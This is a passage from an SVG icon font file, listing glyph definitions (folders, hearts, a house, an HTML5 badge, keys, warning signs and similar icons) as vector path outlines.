q-17 0 -29.5 -12t-12.5 -29t12.5 -29.5t29.5 -12.5t29 12.5t12 29.5t-12 29t-29 12zM542 -33q17 0 29 12t12 29t-12 29.5t-29 12.5t-29.5 -12.5t-12.5 -29.5t12.5 -29t29.5 -12zM250 592q0 -40 -23.5 -72.5t-59.5 -45.5v-348q36 -13 59.5 -45.5t23.5 -72.5
q0 -52 -36.5 -88.5t-88.5 -36.5t-88.5 36.5t-36.5 88.5q0 40 23.5 72.5t59.5 45.5v348q-36 13 -59.5 45.5t-23.5 72.5q0 52 36.5 88.5t88.5 36.5t88.5 -36.5t36.5 -88.5zM125 633q-17 0 -29.5 -12t-12.5 -29t12.5 -29.5t29.5 -12.5t29.5 12.5t12.5 29.5t-12.5 29t-29.5 12z
M125 -33q17 0 29.5 12t12.5 29t-12.5 29.5t-29.5 12.5t-29.5 -12.5t-12.5 -29.5t12.5 -29t29.5 -12z" />
    <glyph glyph-name="glyph122" unicode="&#xe07a;" horiz-adv-x="667" 
d="M167 126q36 -13 59.5 -45.5t23.5 -72.5q0 -52 -36.5 -88.5t-88.5 -36.5t-88.5 36.5t-36.5 88.5q0 40 23.5 72.5t59.5 45.5v28q0 78 61 133q39 -32 76 -48q-53 -31 -53 -85v-28zM125 -33q17 0 29.5 12t12.5 29t-12.5 29.5t-29.5 12.5t-29.5 -12.5t-12.5 -29.5t12.5 -29
t29.5 -12zM500 474q-36 13 -59.5 45.5t-23.5 72.5q0 52 36.5 88.5t88.5 36.5t88.5 -36.5t36.5 -88.5q0 -40 -23.5 -72.5t-60.5 -45.5v-14q0 -84 -63 -144q-35 29 -76 45q56 35 56 99v14zM542 633q-17 0 -29.5 -12t-12.5 -29t12.5 -29.5t29.5 -12.5t29 12.5t12 29.5t-12 29
t-29 12zM581 126q38 -12 62 -44.5t24 -73.5q0 -52 -36.5 -88.5t-88.5 -36.5t-88.5 36.5t-36.5 88.5q0 39 22 71t58 46q-11 57 -57.5 95t-106.5 38q-94 0 -164 62t-83 154q-38 12 -62 44.5t-24 73.5q0 52 36.5 88.5t88.5 36.5t88.5 -36.5t36.5 -88.5q0 -39 -22 -71t-58 -46
q11 -57 57 -95t106 -38q94 0 164.5 -62.5t83.5 -153.5zM125 633q-17 0 -29.5 -12t-12.5 -29t12.5 -29.5t29.5 -12.5t29.5 12.5t12.5 29.5t-12.5 29t-29.5 12zM542 -33q17 0 29 12t12 29t-12 29.5t-29 12.5t-29.5 -12.5t-12.5 -29.5t12.5 -29t29.5 -12z" />
    <glyph glyph-name="glyph123" unicode="&#xe07b;" 
d="M625 550q52 0 88.5 -36.5t36.5 -88.5v-333q0 -52 -36.5 -88.5t-88.5 -36.5h-500q-52 0 -88.5 36.5t-36.5 88.5v416q0 52 36.5 88.5t88.5 36.5h167q34 0 58.5 -24.5t24.5 -58.5h250zM625 50q17 0 29.5 12.5t12.5 29.5v291h-167q-8 0 -14.5 6.5t-6.5 14.5t6.5 14.5
t14.5 6.5h167q0 17 -12.5 29.5t-29.5 12.5h-250q-35 0 -59 24.5t-24 58.5h-167q-17 0 -29.5 -12.5t-12.5 -29.5v-83h167q8 0 14.5 -6.5t6.5 -14.5t-6.5 -14.5t-14.5 -6.5h-167v-291q0 -17 12.5 -29.5t29.5 -12.5h500zM500 300q17 0 29.5 -12.5t12.5 -29.5t-12.5 -29
t-29.5 -12h-83v-84q0 -17 -12.5 -29t-29.5 -12t-29.5 12t-12.5 29v84h-83q-17 0 -29.5 12t-12.5 29t12.5 29.5t29.5 12.5h83v83q0 17 12.5 29.5t29.5 12.5t29.5 -12.5t12.5 -29.5v-83h83z" />
    <glyph glyph-name="glyph124" unicode="&#xe07c;" 
d="M625 550q52 0 88.5 -36.5t36.5 -88.5v-333q0 -52 -36.5 -88.5t-88.5 -36.5h-500q-52 0 -88.5 36.5t-36.5 88.5v416q0 52 36.5 88.5t88.5 36.5h167q34 0 58.5 -24.5t24.5 -58.5h250zM125 550q-17 0 -29.5 -12.5t-12.5 -29.5v-83h584q0 17 -12.5 29.5t-29.5 12.5h-250
q-35 0 -59 24.5t-24 58.5h-167zM625 50q17 0 29.5 12.5t12.5 29.5v291h-584v-291q0 -17 12.5 -29.5t29.5 -12.5h500zM500 217h-250q-17 0 -29.5 12t-12.5 29t12.5 29.5t29.5 12.5h250q17 0 29.5 -12.5t12.5 -29.5t-12.5 -29t-29.5 -12z" />
    <glyph glyph-name="glyph125" unicode="&#xe07d;" horiz-adv-x="876" 
d="M846 467q16 0 24 -11.5t5 -30.5l-92 -333q-13 -53 -58.5 -89t-99.5 -36h-500q-53 0 -89 36t-36 89v416q0 53 36 89t89 36h171q34 0 58.5 -24.5t24.5 -58.5h250q40 0 72 -22.5t45 -60.5h100zM83 508v-387l67 262q6 19 20.5 30.5t33.5 11.5h463q0 19 -11.5 30.5t-30.5 11.5
h-250q-35 0 -59 24.5t-24 58.5h-167q-19 0 -30.5 -11.5t-11.5 -30.5zM704 112l75 271h-571q-3 0 -7.5 -2.5t-4.5 -5.5l-79 -292q-3 -12 -1.5 -19.5t5.5 -10.5l4 -3h500q25 0 49 18.5t30 43.5z" />
    <glyph glyph-name="glyph126" unicode="&#xe07e;" 
d="M625 550q52 0 88.5 -36.5t36.5 -88.5v-333q0 -52 -36.5 -88.5t-88.5 -36.5h-500q-52 0 -88.5 36.5t-36.5 88.5v416q0 52 36.5 88.5t88.5 36.5h167q34 0 58.5 -24.5t24.5 -58.5h250zM125 550q-17 0 -29.5 -12.5t-12.5 -29.5v-83h584q0 17 -12.5 29.5t-29.5 12.5h-250
q-35 0 -59 24.5t-24 58.5h-167zM625 50q17 0 29.5 12.5t12.5 29.5v291h-584v-291q0 -17 12.5 -29.5t29.5 -12.5h500z" />
    <glyph glyph-name="glyph127" unicode="&#xe07f;" 
d="M708 467q17 0 29.5 -12.5t12.5 -29.5v-167q0 -17 -12.5 -29t-29.5 -12v-209q0 -52 -36.5 -88.5t-88.5 -36.5h-416q-52 0 -88.5 36.5t-36.5 88.5v209q-17 0 -29.5 12t-12.5 29v167q0 17 12.5 29.5t29.5 12.5h98q-15 32 -15 62q0 60 43 103t103 43q62 0 104 -44
q42 44 104 44q60 0 103 -43t43 -103q0 -30 -15 -62h98zM667 300v83h-209v-83h209zM333 508v-41h84v41h-84zM417 383h-84v-83h84v83zM479 592q-20 0 -36.5 -12t-22.5 -31q16 -2 27 -13.5t11 -27.5v-37q12 -4 21 -4q26 0 44.5 18.5t18.5 43.5t-19 44t-44 19zM208 529
q0 -25 18.5 -43.5t44.5 -18.5q9 0 21 4v37q0 16 11 27.5t27 13.5q-6 19 -22.5 31t-36.5 12q-25 0 -44 -19t-19 -44zM292 383h-209v-83h209v83zM167 -33h125v291h-167v-250q0 -17 12.5 -29t29.5 -12zM333 -33h84v291h-84v-291zM583 -33q17 0 29.5 12t12.5 29v250h-167v-291
h125z" />
    <glyph glyph-name="glyph128" unicode="&#xe080;" horiz-adv-x="652" 
d="M277 550q-69 0 -117.5 -49t-48.5 -118t48.5 -117.5t117.5 -48.5t118 48.5t49 117.5t-49 118t-118 49zM277 633q103 0 176.5 -73.5t73.5 -176.5t-73.5 -176.5t-176.5 -73.5t-176.5 73.5t-73.5 176.5t73.5 176.5t176.5 73.5zM527 -33q17 0 29.5 -12.5t12.5 -29.5
t-12.5 -29.5t-29.5 -12.5h-416q-17 0 -29.5 12.5t-12.5 29.5t12.5 29.5t29.5 12.5h166v41q-155 0 -265 110q-12 12 -12 29.5t12 29.5t29.5 12t29.5 -12q85 -85 206 -85q122 0 207 85t85 206q0 122 -85 207l-30 29l86 85q12 12 29.5 12t29.5 -12t11.5 -29.5t-12.5 -29.5
l-28 -28q82 -102 82 -234q0 -155 -110 -265q-77 -77 -181 -100v-51h166z" />
    <glyph glyph-name="glyph129" unicode="&#xe081;" horiz-adv-x="652" 
d="M277 -33v41q-155 0 -265 110q-12 12 -12 29.5t12 29.5t29.5 12t29.5 -12q85 -85 206 -85q122 0 207 85t85 206q0 122 -85 207l-30 29l86 85q12 12 29.5 12t29.5 -12t11.5 -29t-12.5 -29l-28 -29q82 -102 82 -234q0 -155 -110 -265q-77 -77 -181 -100v-51h166
q17 0 29.5 -12.5t12.5 -29.5t-12.5 -29.5t-29.5 -12.5h-416q-17 0 -29.5 12.5t-12.5 29.5t12.5 29.5t29.5 12.5h166zM27 383q0 103 73.5 176.5t176.5 73.5t176.5 -73.5t73.5 -176.5t-73.5 -176.5t-176.5 -73.5t-176.5 73.5t-73.5 176.5z" />
    <glyph glyph-name="glyph130" unicode="&#xe082;" horiz-adv-x="958" 
d="M479 217q-86 0 -147 61t-61 147t61 147t147 61t147.5 -61t61.5 -147t-61.5 -147t-147.5 -61zM479 550q-52 0 -88.5 -36.5t-36.5 -88.5t36.5 -88.5t88.5 -36.5t88.5 36.5t36.5 88.5t-36.5 88.5t-88.5 36.5zM812 175q-44 0 -74 30.5t-30 73.5t30 73.5t74 30.5t74.5 -30.5
t30.5 -73.5t-30.5 -73.5t-74.5 -30.5zM812 342q-25 0 -43.5 -18.5t-18.5 -44.5q0 -25 18 -43.5t44 -18.5t44.5 18.5t18.5 43.5t-18.5 44t-44.5 19zM812 150q64 0 105 -27t41 -63q0 -18 -42 -32t-104 -14q-34 0 -66 5l1 -11q0 -33 -77 -58t-191 -25q-120 0 -193.5 25
t-73.5 58l1 12q-40 -6 -67 -6q-65 0 -105.5 14t-40.5 32q0 36 40 63t106 27q79 0 121 -40q79 65 212 65t212 -65q42 40 121 40zM146 56q48 0 82 9l10 14q-30 30 -92 30q-78 0 -101 -39q35 -14 101 -14zM479 8q105 0 173 24q-20 24 -65.5 42t-107.5 18q-65 0 -110 -18
t-64 -42q67 -24 174 -24zM812 56q67 0 101 15q-10 15 -36.5 26.5t-64.5 11.5q-61 0 -92 -29q4 -5 10 -15q32 -9 82 -9zM146 175q-44 0 -74 30.5t-30 73.5t30.5 73.5t73.5 30.5t73.5 -30.5t30.5 -73.5t-30 -73.5t-74 -30.5zM146 342q-26 0 -44.5 -19t-18.5 -44t18.5 -43.5
t44.5 -18.5t44 18.5t18 43.5q0 26 -18.5 44.5t-43.5 18.5z" />
    <glyph glyph-name="glyph131" unicode="&#xe083;" horiz-adv-x="958" 
d="M688 425q0 -86 -61.5 -147t-147.5 -61t-147 61t-61 147t61 147t147 61t147.5 -61t61.5 -147zM917 279q0 -43 -30.5 -73.5t-74.5 -30.5t-74 30.5t-30 73.5t30 73.5t74 30.5t74.5 -30.5t30.5 -73.5zM812 150q64 0 105 -27t41 -63q0 -18 -42 -32t-104 -14q-34 0 -66 5l1 -11
q0 -33 -77 -58t-191 -25q-120 0 -193.5 25t-73.5 58l1 12q-40 -6 -67 -6q-65 0 -105.5 14t-40.5 32q0 36 40 63t106 27q79 0 121 -40q79 65 212 65t212 -65q42 40 121 40zM250 279q0 -43 -30 -73.5t-74 -30.5t-74 30.5t-30 73.5t30 73.5t74 30.5q43 0 73.5 -30.5t30.5 -73.5
z" />
    <glyph glyph-name="glyph132" unicode="&#xe084;" 
d="M750 258v-108l-1 -5q1 -10 1 -33v-83q0 -60 -43 -103t-103 -43t-103 43t-43 103v83q0 47 23 84.5t60 52.5q-3 66 -51 112.5t-115 46.5t-115 -46.5t-51 -112.5q37 -15 60 -52.5t23 -84.5v-83q0 -60 -43 -103t-103 -43t-103 43t-43 103v83q0 23 1 33l-1 5v108
q0 155 110 265t265 110t265 -110t110 -265zM83 258v-41h42q0 41 1 41q6 79 54 139l-37 37q-60 -79 -60 -176zM208 29v83q0 27 -12.5 45t-28.5 18h-79q-5 -35 -5 -63v-83q0 -25 18.5 -43.5t44.5 -18.5t44 18.5t18 43.5zM517 404q11 11 32 31.5t31 30.5l26 26q-96 96 -231 96
t-231 -96l74 -74l15 -14q58 58 142 58t142 -58zM667 29v83q0 28 -5 63h-79q-16 0 -28.5 -18t-12.5 -45v-83q0 -25 18 -43.5t44 -18.5t44.5 18.5t18.5 43.5zM667 217v41q0 97 -60 176l-37 -37q49 -62 55 -139v-41h42z" />
    <glyph glyph-name="glyph133" unicode="&#xe085;" horiz-adv-x="808" 
d="M0 408q0 93 67 159t158 66q114 0 183 -95q32 44 78.5 69.5t96.5 25.5q94 0 159.5 -65.5t65.5 -159.5q0 -129 -83 -212q-30 -31 -101.5 -85t-132.5 -96.5t-62 -43.5q-18 -9 -25 -9t-25 9q-2 2 -62.5 44.5t-132 96.5t-101.5 84q-83 83 -83 212z" />
    <glyph glyph-name="glyph134" unicode="&#xe086;" horiz-adv-x="808" 
d="M0 408q0 93 67 159t158 66q114 0 183 -95q32 44 78.5 69.5t96.5 25.5q94 0 159.5 -65.5t65.5 -159.5q0 -129 -83 -212q-30 -31 -101.5 -85t-132.5 -96.5t-62 -43.5q-18 -9 -25 -9t-25 9q-2 2 -62.5 44.5t-132 96.5t-101.5 84q-83 83 -83 212zM408 367v-309q60 39 145 101
t118 95q62 62 62 154q0 59 -41 100.5t-100 41.5t-100.5 -41.5t-41.5 -100.5q0 -19 -11.5 -30t-30.5 -11z" />
    <glyph glyph-name="glyph135" unicode="&#xe087;" horiz-adv-x="812" 
d="M406 -33q-13 0 -23 7q-21 14 -67.5 46.5t-123.5 90t-107 87.5q-85 85 -85 211q0 93 65.5 158.5t158.5 65.5q114 0 182 -94q31 44 79.5 69t103.5 25q93 0 158 -65.5t65 -158.5q0 -126 -85 -211q-30 -30 -106 -87.5t-124 -90.5t-67 -46q-10 -7 -24 -7zM224 550
q-58 0 -99.5 -41t-41.5 -100q0 -91 61 -152q63 -63 262 -198q199 135 262 198q61 61 61 152q0 59 -41 100t-99 41q-59 0 -100 -41t-41 -100q0 -17 -12.5 -29t-29.5 -12t-29 12t-12 29q0 59 -41.5 100t-99.5 41z" />
    <glyph glyph-name="glyph136" unicode="&#xe088;" horiz-adv-x="729" 
d="M365 368q0 76 -53.5 129t-129.5 53t-129 -53t-53 -129q0 -110 73 -183l292 -218q225 152 291 218q73 73 73 183q0 76 -53 129t-129 53t-129 -53t-53 -129v0z" />
    <glyph glyph-name="glyph137" unicode="&#xe089;" horiz-adv-x="917" 
d="M886 364q31 -24 31 -64q0 -34 -24.5 -58.5t-59.5 -24.5h-41v-250q0 -35 -25 -59.5t-59 -24.5h-500q-34 0 -58.5 24.5t-24.5 59.5v250h-42q-35 0 -59 24.5t-24 58.5q0 37 29 63q63 53 163 139t169 145t70 60l27 23l28 -23q1 -1 69.5 -60t168.5 -145t162 -138zM542 -33v208
h-167v-208h167zM708 300h125q-185 155 -375 320q-190 -165 -375 -320h125v-333h125v250h250v-250h125v333z" />
    <glyph glyph-name="glyph138" unicode="&#xe08a;" horiz-adv-x="833" 
d="M417 675q257 -223 400 -343q16 -13 16 -32q0 -17 -12 -29.5t-29 -12.5h-84v-291q0 -17 -12 -29.5t-29 -12.5h-125q-17 0 -29.5 12.5t-12.5 29.5v166h-167v-166q0 -17 -12 -29.5t-29 -12.5h-125q-17 0 -29.5 12.5t-12.5 29.5v291h-83q-17 0 -29.5 12.5t-12.5 29.5t15 32z
" />
    <glyph glyph-name="glyph139" unicode="&#xe08b;" horiz-adv-x="583" 
d="M338 654v-62h-42v125h46l25 -46l29 46h42v-125h-42v62l-29 -46zM558 592h-100v125h42v-84h58v-41zM200 592v83h-38v42h117v-42h-37v-83h-42zM67 633v-41h-42v125h42v-42h37v42h42v-125h-42v41h-37zM0 550h583l-50 -600l-241 -67l-242 67zM471 358l8 71h-375l21 -221h258
l-8 -96l-83 -20l-84 20l-4 63h-75l13 -121l150 -42l150 42l20 229h-266l-8 75h283z" />
    <glyph glyph-name="glyph140" unicode="&#xe08c;" horiz-adv-x="833" 
d="M271 467q-25 0 -44 -18.5t-19 -44.5q0 -25 18.5 -43.5t44.5 -18.5q25 0 43.5 18t18.5 44t-18.5 44.5t-43.5 18.5zM271 508q43 0 73.5 -30t30.5 -74t-30.5 -74t-73.5 -30t-73.5 30t-30.5 74t30.5 74t73.5 30zM396 175q-39 0 -75 21t-71 21q-32 0 -67 -84h474
q-15 68 -37 116.5t-37 50.5q-27 0 -77 -56q-20 -22 -32.5 -33.5t-34 -23.5t-43.5 -12zM583 342q37 0 68 -62.5t44 -125.5l13 -62h-583q2 7 5 18t15 39.5t25 50.5t35 40t45 18q44 0 81 -20.5t65 -20.5q20 0 43.5 19.5t42 43t46 43t55.5 19.5zM833 550v-500q0 -34 -24.5 -58.5
t-58.5 -24.5h-667q-35 0 -59 24.5t-24 58.5v500q0 34 24 58.5t59 24.5h667q34 0 58.5 -24.5t24.5 -58.5zM750 50v500h-667v-500h667z" />
    <glyph glyph-name="glyph141" unicode="&#xe08d;" horiz-adv-x="833" 
d="M167 446q0 104 104 104t104 -104t-104 -104t-104 104zM583 383q33 0 62 -49q41 -74 63 -201h-583l13 42q14 43 44.5 84t67.5 41q43 0 101 -31q20 -11 45 -11q30 0 69 44q46 52 73 68q22 13 45 13zM0 592q0 34 24 58.5t59 24.5h667q34 0 58.5 -24.5t24.5 -58.5v-500
q0 -35 -24.5 -59.5t-58.5 -24.5h-667q-34 0 -58.5 24.5t-24.5 59.5v500zM750 92v500h-667v-500h667z" />
    <glyph glyph-name="glyph142" unicode="&#xe08e;" horiz-adv-x="896" 
d="M813 262q0 74 -53.5 127t-126.5 53q-75 0 -127 -52l-58 -56l-57 55q-53 53 -128 53q-73 0 -126.5 -53t-53.5 -127t53.5 -127t126.5 -53q75 0 127 52l58 56l57 -56q52 -52 127 -52q74 0 127.5 53.5t53.5 126.5zM633 525q109 0 186 -77t77 -186t-77 -186q-78 -78 -186 -78
q-109 0 -185 76q-76 -76 -185 -76q-108 0 -186 78q-77 77 -77 186t77 186t186 77q110 0 185 -75q75 75 185 75zM229 262q0 -14 10 -24t24 -10t24 10l26 24l-24 23q-11 11 -26 11q-14 0 -24 -10t-10 -24zM187 262q0 31 22.5 53.5t53.5 22.5q32 0 55 -23l55 -53l-56 -54
q-21 -21 -54 -21q-31 0 -53.5 22t-22.5 53zM667 262q0 14 -9.5 23.5t-24.5 9.5q-16 0 -25 -9l-25 -24l24 -23q11 -11 26 -11q14 0 24 10t10 24zM708 262q0 -31 -22 -53t-53 -22q-33 0 -55 22l-55 53l56 53q22 22 54 22q31 0 53 -22t22 -53z" />
    <glyph glyph-name="glyph143" unicode="&#xe08f;" horiz-adv-x="729" 
d="M0 262q0 74 53 127t127 53t127 -53l58 -55l58 56q52 52 126 52q73 0 126.5 -53t53.5 -127t-53.5 -127t-126.5 -53q-74 0 -127 53l-57 55l-59 -56q-52 -52 -126 -52t-127 53t-53 127zM180 338q-31 0 -53.5 -22.5t-22.5 -53.5q0 -32 22 -54t54 -22t54 22l55 54l-55 53
q-23 23 -54 23zM603 208q22 22 22 54t-22 54t-53.5 22t-53.5 -22l-56 -54l55 -53q22 -22 54 -22.5t54 21.5z" />
    <glyph glyph-name="glyph144" unicode="&#xe090;" horiz-adv-x="458" 
d="M343 133q40 -5 62 -41q15 -25 10 -55t-27 -49q-74 -63 -172 -63q-128 0 -176 98q-42 87 10 190l24 46q-41 5 -63 41q-15 25 -10 55t27 49q51 43 123 57q-26 42 -26 89q0 69 49 118t118 49t117.5 -49t48.5 -118q0 -50 -27.5 -91.5t-72.5 -61.5q32 -42 35 -98.5t-27 -119.5
zM292 633q-35 0 -59.5 -24.5t-24.5 -58.5t24.5 -58.5t59.5 -24.5q34 0 58.5 24.5t24.5 58.5t-24.5 58.5t-58.5 24.5zM216 8q31 0 60.5 10.5t43.5 21.5l13 10q-26 -9 -50 -9q-37 0 -45 26.5t12 65.5l42 83q35 73 8 120t-99 47q-31 0 -60.5 -10.5t-43.5 -20.5l-14 -10
q27 9 51 9q37 0 45 -27t-12 -65l-42 -83q-35 -73 -8 -120.5t99 -47.5z" />
    <glyph glyph-name="glyph145" unicode="&#xe091;" horiz-adv-x="333" 
d="M264 70q15 5 24.5 -9.5t-3.5 -26.5q-4 -4 -17.5 -13t-47 -21t-67.5 -12q-87 0 -119 63q-28 59 10 134l42 83q22 44 2 58q-4 4 -17 4q-9 0 -19.5 -2t-17.5 -4l-6 -2q-15 -5 -24.5 9t3.5 26q5 5 17.5 13.5t46 21t67.5 12.5q89 0 120 -63q28 -59 -10 -134l-42 -83
q-22 -45 -2 -59q3 -3 17 -3q9 0 19.5 2t17.5 4zM125 550q0 104 104 104t104 -104t-104 -104t-104 104z" />
    <glyph glyph-name="glyph146" unicode="&#xe092;" horiz-adv-x="819" 
d="M410 570q-39 0 -65 -44l-246 -411q-26 -44 -8.5 -75.5t69.5 -31.5h500q52 0 69.5 32t-9.5 76l-246 410q-26 44 -64 44zM160 -75q-67 0 -113.5 38t-46.5 102q0 45 28 93l246 411q50 85 136 85q85 0 135 -85l247 -411q51 -85 10 -159q-43 -74 -142 -74h-500zM472 102
q-4 -4 -10.5 -10t-28.5 -15.5t-45 -8.5q-31 2 -44 26.5t-1 61.5l17 51q12 36 -10 48q-8 3 -18 1.5t-18 -4.5l-8 -4q4 4 10.5 10t28.5 15.5t45 8.5q31 -2 44 -27t1 -62l-17 -51q-11 -36 10 -47q8 -3 18 -1.5t18 4.5zM355 383q0 55 55 55q54 0 54 -55q0 -54 -54 -54
q-55 0 -55 54z" />
    <glyph glyph-name="glyph147" unicode="&#xe093;" horiz-adv-x="819" 
d="M160 -75q-67 0 -113.5 38t-46.5 103q0 45 28 92l246 411q50 85 136 85q85 0 135 -85l247 -411q27 -44 27 -93q0 -38 -17 -66q-43 -74 -142 -74h-500zM410 448q-27 0 -46 -19t-19 -46q0 -26 19.5 -45t45.5 -19q27 0 45.5 19t18.5 45t-19 45.5t-45 19.5zM480 95q6 7 0 12.5
t-12 2.5q-20 -8 -30 -8l-6 1q-14 6 -4 35l17 51q13 41 -3 71t-52 32q-25 1 -48 -8.5t-32.5 -18t-11.5 -11.5q-6 -7 -0.5 -13t12.5 -3q20 8 30 8l6 -1q14 -6 4 -35l-17 -51q-14 -41 2.5 -70.5t52.5 -31.5h6q24 0 45.5 9.5t30.5 17.5t10 11z" />
    <glyph glyph-name="glyph148" unicode="&#xe094;" horiz-adv-x="625" 
d="M500 633q69 0 107 -60t2 -125l-26 -46v-269q0 -52 -36.5 -88.5t-88.5 -36.5h-333q-52 0 -88.5 36.5t-36.5 88.5v334q0 52 36.5 88.5t88.5 36.5h283q36 41 92 41zM464 529l-141 -243l-85 85q-12 12 -30 12q-17 0 -29 -12t-12 -29.5t12 -29.5l125 -125q12 -12 29 -12
q27 2 37 21l167 292q6 20 3 32q-5 17 -21 25.5t-36 0.5q-14 -7 -19 -17zM458 92q17 0 29.5 12t12.5 29v207l-94 -164q-20 -36 -61 -42l-12 -1q-34 0 -59 25l-125 125q-25 25 -25 59t25 59q24 24 59 24t59 -24l47 -47l90 154h-279q-17 0 -29.5 -12t-12.5 -29v-334
q0 -17 12.5 -29t29.5 -12h333z" />
    <glyph glyph-name="glyph149" unicode="&#xe095;" horiz-adv-x="583" 
d="M458 8h-333q-52 0 -88.5 36.5t-36.5 88.5v334q0 52 36.5 88.5t88.5 36.5h208q17 0 29.5 -12.5t12.5 -29.5t-12.5 -29.5t-29.5 -12.5h-208q-17 0 -29.5 -12t-12.5 -29v-334q0 -17 12.5 -29t29.5 -12h333q17 0 29.5 12t12.5 29v125q0 17 12.5 29.5t29.5 12.5t29 -12.5
t12 -29.5v-125q0 -52 -36.5 -88.5t-88.5 -36.5zM340 182q-23 0 -39 16l-111 111q-16 17 -16 40t16 39t39 16t39 -16l60 -59l144 227q11 20 33.5 26.5t42.5 -4.5t26 -33.5t-5 -42.5l-180 -291q-14 -26 -49 -29z" />
    <glyph glyph-name="glyph150" unicode="&#xe096;" horiz-adv-x="646" 
d="M250 -75h-250v184l158 158q-12 36 -12 75q0 104 73 177t177 73t177 -73t73 -177t-73 -177t-177 -73h-63v-84h-83v-83zM83 8h84v84h83v83h146q69 0 117.5 49t48.5 118t-48.5 117.5t-117.5 48.5t-118 -48.5t-49 -117.5q0 -36 15 -69l12 -26l-173 -173v-66zM396 383
q-17 0 -29.5 -12t-12.5 -29t12.5 -29.5t29.5 -12.5t29.5 12.5t12.5 29.5t-12.5 29t-29.5 12zM396 425q34 0 58.5 -24.5t24.5 -58.5q0 -35 -24.5 -59.5t-58.5 -24.5t-59 25t-25 59t24.5 58.5t59.5 24.5z" />
    <glyph glyph-name="glyph151" unicode="&#xe097;" horiz-adv-x="562" 
d="M146 342q0 86 61 147t147 61t147 -61t61 -147t-61 -147.5t-147 -61.5h-104v-83h-83v-83h-84q-20 0 -41 15.5t-32 31.5l-10 15v63l165 164q-19 41 -19 86zM354 258q34 0 59 25t25 59t-24.5 58.5t-59.5 24.5q-34 0 -58.5 -24.5t-24.5 -58.5q0 -35 24.5 -59.5t58.5 -24.5z
" />
    <glyph glyph-name="glyph152" unicode="&#xe098;" horiz-adv-x="833" 
d="M250 258h292v-83h-292v83zM125 258h83v-83h-83v83zM125 425h83v-42h-83v42zM250 300h-125v42h125v-42zM250 425h42v-42h-42v42zM292 342h41v-42h-41v42zM333 425h42v-42h-42v42zM375 342h42v-42h-42v42zM417 425h41v-42h-41v42zM458 342h42v-42h-42v42zM500 425h42v-42
h-42v42zM542 342h41v-42h-41v42zM583 425h42v-42h-42v42zM625 300v42h42v83h41v-125h-83zM667 258v-41h41v-42h-125v42h42v41h42zM750 550q34 0 58.5 -24t24.5 -59v-334q0 -35 -24.5 -59t-58.5 -24h-667q-35 0 -59 24t-24 59v334q0 35 24 59t59 24h667zM750 133v334h-667
v-334h667z" />
    <glyph glyph-name="glyph153" unicode="&#xe099;" horiz-adv-x="708" 
d="M708 342q0 -144 -87 -257.5t-225 -150.5v-51q0 -17 -12.5 -29t-29.5 -12t-29.5 12t-12.5 29v51q-138 37 -225 150.5t-87 257.5q0 153 98 270.5t249 145.5l7 1l8 -1q151 -28 248.5 -145.5t97.5 -270.5zM396 21q102 35 165.5 123t63.5 198q0 121 -76.5 214.5t-194.5 117.5
q-118 -24 -194.5 -117.5t-76.5 -214.5q0 -109 64 -197.5t166 -123.5v125l-182 181q-9 9 -5 20t14.5 14t20.5 -5l152 -152v150l-99 98q-9 9 -5 20t14.5 14t20.5 -5l68 -68v137q0 17 12.5 29.5t29.5 12.5t29.5 -12.5t12.5 -29.5v-137l68 68q9 9 20.5 5t14.5 -14t-5 -20
l-98 -98v-150l152 152q14 14 28.5 -0.5t0.5 -28.5l-181 -181v-125z" />
    <glyph glyph-name="glyph154" unicode="&#xe09a;" horiz-adv-x="625" 
d="M312 571q51 0 87.5 -36.5t36.5 -87.5q0 -9 -6 -15t-15 -6t-15 6t-6 15q0 34 -24 58t-58 24q-20 0 -20 21t20 21zM312 -117q-17 0 -29 12.5t-12 29.5h-83q-17 0 -29.5 12.5t-12.5 29.5v125q0 25 -18 61t-72 114l-3 5q-53 79 -53 174q0 129 91.5 220.5t220.5 91.5
t221 -91.5t92 -220.5q0 -97 -57 -179q-54 -77 -71.5 -112.5t-17.5 -62.5v-125q0 -17 -12 -29.5t-29 -12.5h-84q0 -17 -12.5 -29.5t-29.5 -12.5zM396 8v42h-167v-42h167zM500 314q42 61 42 132q0 94 -67.5 161.5t-162.5 67.5q-94 0 -161.5 -67.5t-67.5 -161.5q0 -70 42 -131
l3 -6q82 -117 96 -176h47v84q0 17 12 29t29 12t29.5 -12t12.5 -29v-84h46q13 57 100 181z" />
    <glyph glyph-name="glyph155" unicode="&#xe09b;" horiz-adv-x="758" 
d="M629 550q-19 0 -32 -13l-72 -72l-13 13q-36 36 -91 36t-91 -36l-174 -174q-38 -38 -38 -92q0 -53 38 -91l12 -13l-71 -71q-13 -13 -13 -32t13 -33q14 -14 32 -14q19 0 33 14l71 72l13 -13q38 -38 92 -38q53 0 91 38l174 174q37 37 37 91t-37 91l-13 13l72 72q14 14 14 33
t-14 32q-13 13 -33 13zM129 -125q-53 0 -91 38.5t-38 90.5q0 54 38 92l20 20q-23 46 -23 96q0 89 62 151l174 174q61 61 150 61q52 0 96 -23l21 21q37 37 91 37q53 0 91 -38.5t38 -90.5q0 -55 -38 -91l-20 -20q24 -48 24 -97q0 -87 -63 -150l-173 -174q-62 -62 -151 -62
q-51 0 -97 23l-20 -20q-38 -38 -91 -38zM460 250q-34 1 -59 26t-26 59l-76 -77q34 -1 58.5 -25.5t25.5 -58.5zM421 424q15 0 26 -11l13 -13l-30 -30q-14 -14 -14 -33t14 -32q13 -13 32 -13q20 0 33 13l30 30l13 -13q11 -11 11 -26q0 -16 -11 -27l-174 -173q-11 -11 -26 -11
q-16 0 -27 11l-13 12l30 30q14 14 14 33t-14 32q-14 14 -32 14q-19 0 -33 -14l-30 -30l-13 13q-10 10 -10 26q0 17 10 27l174 174q11 11 27 11z" />
    <glyph glyph-name="glyph156" unicode="&#xe09c;" horiz-adv-x="592" 
d="M578 537q14 -13 14 -32t-14 -33l-71 -72l12 -13q38 -38 38 -91t-38 -91l-173 -174q-38 -38 -92 -38q-53 0 -91 38l-13 13l-72 -72q-14 -14 -32 -14q-19 0 -33 14q-13 14 -13 33t13 32l72 71l-13 13q-37 37 -37 92q0 54 37 91l174 174q37 37 91.5 37t91.5 -37l13 -13
l71 72q13 13 32 13t33 -13zM455 269q10 10 10 27q0 16 -10 26l-13 13l-30 -30q-13 -13 -33 -13q-19 0 -32 13t-13 32t13 33l30 30l-13 13q-11 11 -26 11q-16 0 -27 -11l-174 -174q-11 -11 -11 -26q0 -16 11 -27l13 -13l30 30q14 14 33 14q18 0 32 -14q13 -13 13 -32t-13 -33
l-30 -30l13 -12q11 -11 26 -11q16 0 27 11z" />
    <glyph glyph-name="glyph157" unicode="&#xe09d;" horiz-adv-x="636" 
